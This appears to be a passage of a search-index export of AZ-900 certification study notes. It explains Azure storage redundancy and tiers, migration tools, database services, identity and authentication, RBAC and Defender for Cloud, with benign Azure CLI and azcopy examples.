        For Availability Zone-enabled Regions, zone-redundant storage (ZRS) replicates your Azure Storage data synchronously across three Azure availability zones in the primary region. ZRS offers durability for Azure Storage data objects of at least 12 nines (99.9999999999%) over a given year. With ZRS, your data is still accessible for both read and write operations even if a zone becomes unavailable. Microsoft recommends using ZRS in the primary region for scenarios that require high availability. ZRS is also recommended for restricting replication of data within a country or region to meet data governance requirements.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-secondary-region","title":"Redundancy in the secondary region","text":"

        For applications requiring high durability, you can choose to additionally copy the data in your storage account to a secondary region that is hundreds of miles away from the primary region. If the data in your storage account is copied to a secondary region, then your data is durable even in the event of a catastrophic failure that prevents the data in the primary region from being recovered. When you create a storage account, you select the primary region for the account. The paired secondary region is based on Azure Region Pairs, and can't be changed.

        By default, data in the secondary region isn't available for read or write access unless there's a failover to the secondary region. If the primary region becomes unavailable, you can choose to fail over to the secondary region. After the failover has completed, the secondary region becomes the primary region, and you can again read and write data.

        Because data is replicated to the secondary region asynchronously, a failure that affects the primary region may result in data loss if the primary region can't be recovered. The interval between the most recent writes to the primary region and the last write to the secondary region is known as the recovery point objective (RPO). The RPO indicates the point in time to which data can be recovered. Azure Storage typically has an RPO of less than 15 minutes, although there's currently no SLA on how long it takes to replicate data to the secondary region.

        Azure Storage offers two options for copying your data to a secondary region: geo-redundant storage (GRS) and geo-zone-redundant storage (GZRS). GRS is similar to running LRS in two regions, and GZRS is similar to running ZRS in the primary region and LRS in the secondary region.

        Geo-redundant storage (GRS)

        GRS copies your data synchronously three times within a single physical location in the primary region using LRS. It then copies your data asynchronously to a single physical location in the secondary region (the region pair) using LRS. GRS offers durability for Azure Storage data objects of at least 16 nines (99.99999999999999%) over a given year.

        Geo-zone-redundant storage (GZRS)

        GZRS combines the high availability provided by redundancy across availability zones with protection from regional outages provided by geo-replication. Data in a GZRS storage account is copied across three Azure availability zones in the primary region (similar to ZRS) and is also replicated to a secondary geographic region, using LRS, for protection from regional disasters. Microsoft recommends using GZRS for applications requiring maximum consistency, durability, and availability, excellent performance, and resilience for disaster recovery. GZRS is designed to provide at least 16 nines (99.99999999999999%) of durability of objects over a given year.

        Read access to data in the secondary region (RA-GRS)

        Geo-redundant storage (with GRS or GZRS) replicates your data to another physical location in the secondary region to protect against regional outages. However, that data is available to be read only if the customer or Microsoft initiates a failover from the primary to secondary region. However, if you enable read access to the secondary region, your data is always available, even when the primary region is running optimally. For read access to the secondary region, enable read-access geo-redundant storage (RA-GRS) or read-access geo-zone-redundant storage (RA-GZRS). Remember that the data in your secondary region may not be up-to-date due to RPO.
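        As a sketch, assuming the hypothetical account from earlier, the redundancy option of an existing account is changed through its SKU:

        ```bash
        # Hypothetical names; switches an existing account from LRS to geo-redundant storage,
        # then enables read access to the secondary region (RA-GRS)
        az storage account update --name mystorageacct12345 --resource-group my-rg --sku Standard_GRS
        az storage account update --name mystorageacct12345 --resource-group my-rg --sku Standard_RAGRS
        ```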

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services_1","title":"Azure storage services","text":"
          1. Azure Blobs: A massively scalable object store for text and binary data. Also includes support for big data analytics through Data Lake Storage Gen2.
          2. Azure Files: Managed file shares for cloud or on-premises deployments.
          3. Azure Queues: A messaging store for reliable messaging between application components.
          4. Azure Disks: Block-level storage volumes for Azure VMs.
          5. Azure Tables: NoSQL table option for structured, non-relational data.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-blobs","title":"Azure Blobs","text":"

        Azure Blob storage is for storing massive amounts of data, such as text or binary data. Azure Blob storage is unstructured, meaning that there are no restrictions on the kinds of data it can hold. Blob storage is ideal for:

        • Serving images or documents directly to a browser.
        • Storing files for distributed access.
        • Streaming video and audio.
        • Storing data for backup and restore, disaster recovery, and archiving.
        • Storing data for analysis by an on-premises or Azure-hosted service.

        Objects in blob storage can be accessed from anywhere in the world via HTTP or HTTPS. Users or client applications can access blobs via URLs, the Azure Storage REST API, Azure PowerShell, Azure CLI, or an Azure Storage client library.

        Azure Storage offers different access tiers for your blob storage:

        • Hot access tier: Optimized for storing data that is accessed frequently (for example, images for your website).
        • Cool access tier: Optimized for data that is infrequently accessed and stored for at least 30 days (for example, invoices for your customers).
        • Cold access tier: Optimized for storing data that is infrequently accessed and stored for at least 90 days.
        • Archive access tier: Appropriate for data that is rarely accessed and stored for at least 180 days, with flexible latency requirements (for example, long-term backups).

        Some considerations:

        • Hot, cool, and cold access tiers can be set at the account level. The archive access tier isn't available at the account level.
        • Hot, cool, cold, and archive tiers can be set at the blob level, during or after upload.
        • Data in the cool and cold access tiers can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. For cool and cold data, a lower availability service-level agreement (SLA) and higher access costs compared to hot data are acceptable trade-offs for lower storage costs.
        • Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data.
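        A sketch of setting the tier on a single blob, with hypothetical account, container, and blob names:

        ```bash
        # Hypothetical names; moves one blob to the Cool tier (Archive works the same way,
        # but reading an archived blob again first requires rehydration)
        az storage blob set-tier \
          --account-name mystorageacct12345 \
          --container-name docs \
          --name invoice-2023.pdf \
          --tier Cool \
          --auth-mode login
        ```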
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-files","title":"Azure Files","text":"

        Azure File storage offers fully managed file shares in the cloud that are accessible via the industry standard Server Message Block (SMB) or Network File System (NFS) protocols. Azure Files file shares can be mounted concurrently by cloud or on-premises deployments. SMB Azure file shares are accessible from Windows, Linux, and macOS clients. NFS Azure Files shares are accessible from Linux or macOS clients.

        PowerShell cmdlets and Azure CLI can be used to create, mount, and manage Azure file shares as part of the administration of Azure applications. You can create and manage Azure file shares using Azure portal and Azure Storage Explorer.

        Applications running in Azure can access data in the share via file system I/O APIs. In addition to file system I/O APIs, you can use Azure Storage Client Libraries or the Azure Storage REST API.
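        A sketch of creating a share and mounting it over SMB from a Linux client, with hypothetical names and assuming the account key is exported as AZURE_STORAGE_KEY:

        ```bash
        # Hypothetical names; az reads the account key from AZURE_STORAGE_KEY
        az storage share create --account-name mystorageacct12345 --name myshare

        # Mount the SMB share (outbound TCP 445 must be allowed)
        sudo mkdir -p /mnt/myshare
        sudo mount -t cifs //mystorageacct12345.file.core.windows.net/myshare /mnt/myshare \
          -o vers=3.0,username=mystorageacct12345,password=$AZURE_STORAGE_KEY,serverino
        ```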

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-queues","title":"Azure Queues","text":"

        Azure Queue storage is a service for storing large numbers of messages. Once stored, you can access the messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue can contain as many messages as your storage account has room for (potentially millions). Each individual message can be up to 64 KB in size. Queues are commonly used to create a backlog of work to process asynchronously.

        Queue storage can be combined with compute functions like Azure Functions to take an action when a message is received.
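        A minimal sketch of the queue workflow, with a hypothetical queue name and assuming AZURE_STORAGE_ACCOUNT and AZURE_STORAGE_KEY are exported:

        ```bash
        # Hypothetical queue; create it, enqueue a message, then dequeue it
        az storage queue create --name tasks
        az storage message put --queue-name tasks --content "process-order-42"
        az storage message get --queue-name tasks
        ```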

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-disks","title":"Azure Disks","text":"

        Azure Disk storage, or Azure managed disks, are block-level storage volumes managed by Azure for use with Azure VMs. Conceptually, they're the same as a physical disk, but they're virtualized, offering greater resiliency and availability than a physical disk.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-tables","title":"Azure Tables","text":"

        Azure Table storage stores large amounts of structured data. Azure tables are a NoSQL datastore that accepts authenticated calls from inside and outside the Azure cloud.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-migration-options","title":"Azure data migration options","text":"

        Azure Migrate is a service that helps you migrate from an on-premises environment to the cloud:

        • Unified migration platform: A single portal to start, run, and track your migration to Azure.
        • Range of tools: Azure Migrate also integrates with other Azure services and tools, and with independent software vendor (ISV) offerings.
        • Assessment and migration: In the Azure Migrate hub, you can assess and migrate your on-premises infrastructure to Azure.

        Tools to help with migration:

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-discovery-and-assessment","title":"Azure Migrate: Discovery and assessment","text":"

        Discover and assess on-premises servers running on VMware, Hyper-V, and physical servers in preparation for migration to Azure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-server-migration","title":"Azure Migrate: Server Migration","text":"

        Migrate VMware VMs, Hyper-V VMs, physical servers, other virtualized servers, and public cloud VMs to Azure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#data-migration-assistant","title":"Data Migration Assistant","text":"

        Data Migration Assistant is a stand-alone tool to assess SQL Servers. It helps pinpoint potential problems blocking migration. It identifies unsupported features, new features that can benefit you after migration, and the right path for database migration.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service","title":"Azure Database Migration Service","text":"

        Migrate on-premises databases to Azure VMs running SQL Server, Azure SQL Database, or SQL Managed Instances.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-app-service-migration-assistant","title":"Azure App Service migration assistant","text":"

        Azure App Service migration assistant is a standalone tool to assess on-premises websites for migration to Azure App Service. Use Migration Assistant to migrate .NET and PHP web apps to Azure.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-box","title":"Azure Data Box","text":"

        Azure Data Box is a physical migration service that helps transfer large amounts of data in a quick, inexpensive, and reliable way. The secure data transfer is accelerated by shipping you a proprietary Data Box storage device that has a maximum usable storage capacity of 80 terabytes. The Data Box is transported to and from your datacenter via a regional carrier. A rugged case protects and secures the Data Box from damage during transit. You can order the Data Box device via the Azure portal to import or export data from Azure. Data Box is ideally suited to transfer data sizes larger than 40 TB in scenarios with no to limited network connectivity.

        Use cases for importing data:

        • One-time migration: when a large amount of on-premises data is moved to Azure.
        • Moving a media library from offline tapes into Azure to create an online media library.
        • Migrating your VM farm, SQL Server, and applications to Azure.
        • Moving historical data to Azure for in-depth analysis and reporting using HDInsight.
        • Initial bulk transfer: when an initial bulk transfer is done using Data Box (seed) followed by incremental transfers over the network.
        • Periodic uploads: when a large amount of data is generated periodically and needs to be moved to Azure.

        Use cases for exporting data:

        • Disaster recovery: when a copy of the data from Azure is restored to an on-premises network.
        • Security requirements: when you need to be able to export data out of Azure due to government or security requirements.
        • Migrate back to on-premises or to another cloud service provider: when you want to move all the data back to on-premises, or to another cloud service provider, export data via Data Box to migrate the workloads.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azcopy","title":"AzCopy","text":"

        In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

        AzCopy is a command-line utility that you can use to copy blobs or files to or from your storage account. Synchronizing blobs or files with AzCopy is one-direction synchronization. When you synchronize, you designate the source and destination, and AzCopy copies files or blobs in that direction. It doesn't synchronize bi-directionally based on timestamps or other metadata.
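        A sketch of both operations, with hypothetical account/container names and a placeholder SAS token:

        ```bash
        # Hypothetical names and SAS token; one-way copy of a single file to Blob Storage
        azcopy copy './report.csv' 'https://mystorageacct12345.blob.core.windows.net/backups/report.csv?<SAS-token>'

        # One-direction sync of a local folder to a container (no bi-directional merge)
        azcopy sync './data' 'https://mystorageacct12345.blob.core.windows.net/data?<SAS-token>' --recursive
        ```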

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-explorer","title":"Azure Storage Explorer","text":"

        Azure Storage Explorer is a standalone app that provides a graphical interface to manage files and blobs in your Azure Storage Account. It works on Windows, macOS, and Linux operating systems and uses AzCopy on the backend to perform all of the file and blob management tasks.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-file-sync","title":"Azure File Sync","text":"

        Azure File Sync is a tool that lets you centralize your file shares in Azure Files and keep the flexibility, performance, and compatibility of a Windows file server.

        With Azure File Sync, you can:

        • Use any protocol that's available on Windows Server to access your data locally, including SMB, NFS, and FTPS.
        • Have as many caches as you need across the world.
        • Replace a failed local server by installing Azure File Sync on a new server in the same datacenter.
        • Configure cloud tiering so the most frequently accessed files are replicated locally, while infrequently accessed files are kept in the cloud until requested.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-services","title":"Azure Data Services","text":"

        Key database services in Azure: Azure Cosmos DB and Azure SQL Database, plus Azure Database Migration Service for moving data into them.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cosmos-db","title":"Cosmos DB","text":"

        Azure Cosmos DB is a multimodel database service that enables you to scale data out to multiple Azure regions across the world. This enables us to build applications available at a global scale.

        Fast, distributed NoSQL and relational database at any scale (additionally, it supports SQL for querying data stored in Cosmos DB). Ideal for developing high-performance applications of any size or scale with a fully managed and serverless distributed database supporting open-source PostgreSQL, MongoDB, and Apache Cassandra, as well as Java, Node.js, Python, and .NET.

        Use case: As an example, Cosmos DB provides a highly scalable solution to build and query graph-based data solutions.
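        A sketch of provisioning, with hypothetical names, using the NoSQL (SQL) API:

        ```bash
        # Hypothetical names; creates a Cosmos DB account, a database, and a container
        az cosmosdb create --name my-cosmos-account --resource-group my-rg
        az cosmosdb sql database create --account-name my-cosmos-account --resource-group my-rg --name appdb
        az cosmosdb sql container create \
          --account-name my-cosmos-account \
          --resource-group my-rg \
          --database-name appdb \
          --name items \
          --partition-key-path /id
        ```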

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sql-database","title":"Azure SQL Database","text":"

        Azure SQL Database is a PaaS offering in which Microsoft hosts the SQL platform and manages maintenance like upgrades and patching, monitoring, and all activities to assure a 99.99% uptime.

        Additionally, it's a relational database as a service (DBaaS) based on the latest stable version of the Microsoft SQL Server database engine.

        Use case: Flexible, fast, and elastic SQL database for your new apps. Build apps that scale with a fully managed and intelligent SQL database built for the cloud.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service_1","title":"Azure Database Migration Service","text":"

        It's a fully managed service designed to enable seamless migrations from multiple database sources to Azure data platforms with minimal downtime.

        It uses the Microsoft Data Migration Assistant to generate assessment reports prior to migration.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#sql-database-elastic-pools","title":"SQL Database elastic pools","text":"

        Just like Azure VM Scale Sets are used with VMs, you can use Elastic Pools with Azure SQL Databases!

        SQL Database elastic pools are a simple, cost-effective solution for managing and scaling multiple databases that have varying and unpredictable usage demands. The databases in an elastic pool are on a single Azure SQL Database server and share a set number of resources at a set price. Elastic pools in Azure SQL Database enable SaaS developers to optimize the price performance for a group of databases within a prescribed budget while delivering performance elasticity for each database.
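        A minimal sketch with hypothetical names, assuming the logical server my-sql-server already exists:

        ```bash
        # Hypothetical names; creates an elastic pool on an existing logical server
        az sql elastic-pool create --resource-group my-rg --server my-sql-server --name my-pool

        # Databases placed in the pool share its resources instead of being sized individually
        az sql db create --resource-group my-rg --server my-sql-server --name appdb --elastic-pool my-pool
        ```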

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#other-database-services-postgresql-mariadb-mysql-redis-cache","title":"Other database services: PostgreSQL, MariaDB, MySQL, Redis Cache","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-postgresql","title":"Azure Database for PostgreSQL","text":"

        Fully managed, intelligent, and scalable PostgreSQL database.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mysql","title":"Azure Database for MySQL","text":"

        Scalable, open-source MySQL database

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-for-mariadb","title":"Azure Database for MariaDB","text":"

        Fully managed, community MariaDB

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cache-for-redis","title":"Azure Cache for Redis","text":"

        Distributed, in-memory, scalable caching

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-identity-access-and-security","title":"Azure identity, access, and security","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-directory-services","title":"Azure directory services","text":"

        When you secure identities on-premises with Active Directory, Microsoft doesn't monitor sign-in attempts. When you connect Active Directory with Azure AD, Microsoft can help protect you by detecting suspicious sign-in attempts at no extra cost.

        Azure AD provides services such as:

        • Authentication: This includes verifying identity to access applications and resources. It also includes providing functionality such as self-service password reset, multifactor authentication, a custom list of banned passwords, and smart lockout services.
        • Single sign-on: Single sign-on (SSO) enables you to remember only one username and one password to access multiple applications. A single identity is tied to a user, which simplifies the security model. As users change roles or leave an organization, access modifications are tied to that identity, which greatly reduces the effort needed to change or disable accounts.
        • Application management: You can manage your cloud and on-premises apps by using Azure AD. Features like Application Proxy, SaaS apps, the My Apps portal, and single sign-on provide a better user experience.
        • Device management: Along with accounts for individual people, Azure AD supports the registration of devices. Registration enables devices to be managed through tools like Microsoft Intune. It also allows for device-based Conditional Access policies to restrict access attempts to only those coming from known devices, regardless of the requesting user account.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-connect","title":"Azure AD Connect","text":"

        If you had an on-premises environment running Active Directory and a cloud deployment using Azure AD, you would need to maintain two identity sets. However, you can connect Active Directory with Azure AD, enabling a consistent identity experience between cloud and on-premises.

        One method of connecting Azure AD with your on-premises AD is using Azure AD Connect. Azure AD Connect synchronizes user identities between on-premises Active Directory and Azure AD. Azure AD Connect synchronizes changes between both identity systems, so you can use features like SSO, multifactor authentication, and self-service password reset under both systems.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-active-directory-domain-services-azure-ad-ds","title":"Azure Active Directory Domain Services (Azure AD DS)","text":"

        Azure Active Directory Domain Services (Azure AD DS) is a service that provides managed domain services such as domain join, group policy, lightweight directory access protocol (LDAP), and Kerberos/NTLM authentication. Just like Azure AD lets you use directory services without having to maintain the infrastructure supporting it, with Azure AD DS, you get the benefit of domain services without the need to deploy, manage, and patch domain controllers (DCs) in the cloud.

        Azure AD DS integrates with your existing Azure AD tenant. This integration lets users sign into services and applications connected to the managed domain using their existing credentials.

        How does Azure AD DS work? When you create an Azure AD DS managed domain, you define a unique namespace. This namespace is the domain name. Two Windows Server domain controllers are then deployed into your selected Azure region. This deployment of DCs is known as a replica set. You don't need to manage, configure, or update these DCs. The Azure platform handles the DCs as part of the managed domain, including backups and encryption at rest using Azure Disk Encryption.

        A managed domain is configured to perform a one-way synchronization from Azure AD to Azure AD DS. You can create resources directly in the managed domain, but they aren't synchronized back to Azure AD.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-authentication-services","title":"Azure authentication services","text":"

        Authentication is the process of establishing the identity of a person, service, or device. Azure supports multiple authentication methods, including standard passwords, single sign-on (SSO), multifactor authentication (MFA), and passwordless.

        Single sign-on (SSO) enables a user to sign in one time and use that credential to access multiple resources and applications from different providers. Single sign-on is only as secure as the initial authenticator because the subsequent connections are all based on the security of the initial authenticator.

        Multifactor authentication (MFA) is the process of prompting a user for an extra form (or factor) of identification during the sign-in process. These factors fall into three categories:

        • Something the user knows: this might be a challenge question.
        • Something the user has: this might be a code that's sent to the user's mobile phone.
        • Something the user is: this is typically some sort of biometric property, such as a fingerprint or face scan.

        Passwordless authentication methods are more convenient because the password is removed and replaced with something you have, plus something you are, or something you know. Passwordless authentication needs to be set up on a device before it can work.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-multi-factor-authentication","title":"Azure AD Multi-Factor Authentication","text":"

        Azure AD Multi-Factor Authentication is a Microsoft service that provides multifactor authentication capabilities. Azure AD Multi-Factor Authentication enables users to choose an additional form of authentication during sign-in, such as a phone call or mobile app notification.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#windows-hello-for-business","title":"Windows Hello for Business","text":"

        Each organization has different needs when it comes to authentication. Microsoft global Azure and Azure Government offer three passwordless authentication options that integrate with Azure Active Directory (Azure AD): Windows Hello for Business, the Microsoft Authenticator app, and FIDO2 security keys.

        Windows Hello for Business is ideal for information workers that have their own designated Windows PC. The biometric and PIN credentials are directly tied to the user's PC, which prevents access from anyone other than the owner. With public key infrastructure (PKI) integration and built-in support for single sign-on (SSO), Windows Hello for Business provides a convenient method for seamlessly accessing corporate resources on-premises and in the cloud.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-authenticator-app","title":"Microsoft Authenticator App","text":"

        The Authenticator App turns any iOS or Android phone into a strong, passwordless credential. Users can sign in to any platform or browser by getting a notification to their phone, matching a number displayed on the screen to the one on their phone, and then using their biometric (touch or face) or PIN to confirm.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#fido2-security-keys","title":"FIDO2 security keys","text":"

        Fast Identity Online (FIDO) is an open standard for passwordless authentication. FIDO allows users and organizations to leverage the standard to sign in to their resources without a username or password by using an external security key or a platform key built into a device. Users can register and then select a FIDO2 security key at the sign-in interface as their main means of authentication. These FIDO2 security keys are typically USB devices, but could also use Bluetooth or NFC. With a hardware device that handles the authentication, the security of an account is increased as there's no password that could be exposed or guessed.

        The FIDO (Fast IDentity Online) Alliance helps to promote open authentication standards and reduce the use of passwords as a form of authentication. FIDO2 is the latest standard that incorporates the web authentication (WebAuthn) standard.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ad-external-identities","title":"Azure AD external identities","text":"

        Azure AD External Identities refers to all the ways you can securely interact with users outside of your organization.

        • Business to business (B2B) collaboration: Collaborate with external users by letting them use their preferred identity to sign in to your Microsoft applications or other enterprise applications (SaaS apps, custom-developed apps, etc.). B2B collaboration users are represented in your directory, typically as guest users.
        • B2B direct connect: Establish a mutual, two-way trust with another Azure AD organization for seamless collaboration. B2B direct connect currently supports Teams shared channels, enabling external users to access your resources from within their home instances of Teams. B2B direct connect users aren't represented in your directory, but they're visible from within the Teams shared channel and can be monitored in Teams admin center reports.
        • Azure AD business to customer (B2C): Publish modern SaaS apps or custom-developed apps (excluding Microsoft apps) to consumers and customers, while using Azure AD B2C for identity and access management.

        Depending on how you want to interact with external organizations and the types of resources you need to share, you can use a combination of these capabilities.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-conditional-access","title":"Azure conditional access","text":"

        Conditional Access is a tool that Azure Active Directory uses to allow (or deny) access to resources based on identity signals. These signals include who the user is, where the user is, and what device the user is requesting access from. During sign-in, Conditional Access collects signals from the user, makes decisions based on those signals, and then enforces that decision by allowing or denying the access request or challenging for a multifactor authentication response.

        Conditional Access is useful when you need to:

        • Require multifactor authentication (MFA) to access an application depending on the requester's role, location, or network. For example, you could require MFA for administrators but not regular users, or for people connecting from outside your corporate network.
        • Require access to services only through approved client applications. For example, you could limit which email applications are able to connect to your email service.
        • Require users to access your application only from managed devices. A managed device is a device that meets your standards for security and compliance.
        • Block access from untrusted sources, such as access from unknown or unexpected locations.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-resource-manager-for-role-based-access-control-rbac","title":"Azure Resource Manager for role-based access control (RBAC)","text":"

        Azure Resource Manager is a management service that provides a way to organize and secure your cloud resources.

        Azure provides built-in roles that describe common access rules for cloud resources. You can also define your own roles.

        Scopes include:

        • A management group (a collection of multiple subscriptions).
        • A single subscription.
        • A resource group.
        • A single resource.

        Azure RBAC is hierarchical, in that when you grant access at a parent scope, those permissions are inherited by all child scopes. For example:

        • When you assign the Owner role to a user at the management group scope, that user can manage everything in all subscriptions within the management group.
        • When you assign the Reader role to a group at the subscription scope, the members of that group can view every resource group and resource within the subscription.

        Azure RBAC is enforced on any action that's initiated against an Azure resource that passes through Azure Resource Manager.

        You typically access Resource Manager from the Azure portal, Azure Cloud Shell, Azure PowerShell, and the Azure CLI.

        Azure RBAC doesn't enforce access permissions at the application or data level. Application security must be handled by your application.

        Azure RBAC uses an allow model. When you're assigned a role, Azure RBAC allows you to perform actions within the scope of that role. If one role assignment grants you read permissions to a resource group and a different role assignment grants you write permissions to the same resource group, you have both read and write permissions on that resource group.

        You can have up to 2000 role assignments in each subscription.
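        A sketch of one role assignment, with a hypothetical principal, subscription ID, and resource group:

        ```bash
        # Hypothetical principal and scope; grants the built-in Reader role on one resource group
        az role assignment create \
          --assignee someuser@example.com \
          --role "Reader" \
          --scope "/subscriptions/<subscription-id>/resourceGroups/my-rg"
        ```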

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#zero-trust-model","title":"Zero trust model","text":"

        Traditionally, corporate networks were restricted, protected, and generally assumed safe. Only managed computers could join the network, VPN access was tightly controlled, and personal devices were frequently restricted or blocked.

        The Zero Trust model flips that scenario: instead of assuming that a device is safe because it's within the corporate network, it requires everyone to authenticate, and it grants access based on authentication rather than location.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#defense-in-depth","title":"Defense-in-depth","text":"

        A defense-in-depth strategy uses a series of mechanisms to slow the advance of an attack that aims at acquiring unauthorized access to data.

        This approach removes reliance on any single layer of protection. It slows down an attack and provides alert information that security teams can act upon, either automatically or manually.

        Here's a brief overview of the role of each layer:

        • The physical security layer is the first line of defense to protect computing hardware in the datacenter. Physically securing access to buildings and controlling access to computing hardware within the datacenter are the first line of defense.
        • The identity and access layer controls access to infrastructure and change control. This layer is all about ensuring that identities are secure, that access is granted only to what's needed, and that sign-in events and changes are logged.
        • The perimeter layer uses distributed denial of service (DDoS) protection to filter large-scale attacks before they can cause a denial of service for users. The network perimeter protects from network-based attacks against your resources. Identifying these attacks, eliminating their impact, and alerting you when they happen are important ways to keep your network secure (DDoS protection + firewalls).
        • The network layer limits communication between resources through segmentation and access controls: limit communication between resources, deny by default, restrict inbound internet access and limit outbound access where appropriate, and implement secure connectivity to on-premises networks.
        • The compute layer secures access to virtual machines: implement endpoint protection on devices and keep systems patched and current.
        • The application layer helps ensure that applications are secure and free of security vulnerabilities: store sensitive application secrets in a secure storage medium, and make security a design requirement for all application development.
        • The data layer controls access to business and customer data that you need to protect.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-defender-for-cloud","title":"Microsoft Defender for Cloud","text":"

        Defender for Cloud is a monitoring tool for security posture management and threat protection. It monitors your cloud, on-premises, hybrid, and multi-cloud environments to provide guidance and notifications aimed at strengthening your security posture.

        When necessary, Defender for Cloud can automatically deploy a Log Analytics agent to gather security-related data. For Azure machines, deployment is handled directly. For hybrid and multi-cloud environments, Microsoft Defender plans are extended to non-Azure machines with the help of Azure Arc. Cloud security posture management (CSPM) features are extended to multi-cloud machines without the need for any agents.

        Defender for Cloud helps you detect threats across:

        • Azure PaaS services: Detect threats targeting Azure services. You can also perform anomaly detection on your Azure activity logs using the native integration with Microsoft Defender for Cloud Apps (formerly known as Microsoft Cloud App Security).
        • Azure data services: Defender for Cloud includes capabilities that help you automatically classify your data in Azure SQL.
        • Networks: Defender for Cloud helps you limit exposure to brute force attacks. By reducing access to virtual machine ports, using just-in-time VM access, you can harden your network by preventing unnecessary access.

        Defender for Cloud can also protect resources in other clouds (such as AWS and GCP). For example, if you've connected an Amazon Web Services (AWS) account to an Azure subscription, you can enable any of these protections:

        • Defender for Cloud's CSPM features extend to your AWS resources. This agentless plan assesses your AWS resources according to AWS-specific security recommendations, and includes the results in the secure score. The resources will also be assessed for compliance with built-in standards specific to AWS (AWS CIS, AWS PCI DSS, and AWS Foundational Security Best Practices). Defender for Cloud's asset inventory page is a multi-cloud enabled feature helping you manage your AWS resources alongside your Azure resources.
        • Microsoft Defender for Containers extends its container threat detection and advanced defenses to your Amazon EKS Linux clusters.
        • Microsoft Defender for Servers brings threat detection and advanced defenses to your Windows and Linux EC2 instances.

        Defender for Cloud fills three vital needs:

        • Continuously assess \u2013 Know your security posture. Identify and track vulnerabilities. Defender for Cloud helps you continuously assess your environment and includes vulnerability assessment solutions for your virtual machines, container registries, and SQL servers. Microsoft Defender for Servers includes automatic, native integration with Microsoft Defender for Endpoint.
        • Secure \u2013 Harden resources and services with Azure Security Benchmark. In Defender for Cloud, you can set your policies to run on management groups, across subscriptions, and even for a whole tenant. Defender for Cloud assesses whether new resources are configured according to security best practices. If not, they're flagged and you get a prioritized list of recommendations for what you need to fix. In this way, Defender for Cloud enables you not just to set security policies, but to apply secure configuration standards across your resources. To help you understand how important each recommendation is to your overall security posture, Defender for Cloud groups the recommendations into security controls and adds a secure score value to each control.
        • Defend \u2013 Detect and resolve threats to resources, workloads, and services. When Defender for Cloud detects a threat in any area of your environment, it generates a security alert. Security alerts describe details of the affected resources, suggest remediation steps, and in some cases provide an option to trigger a logic app in response.
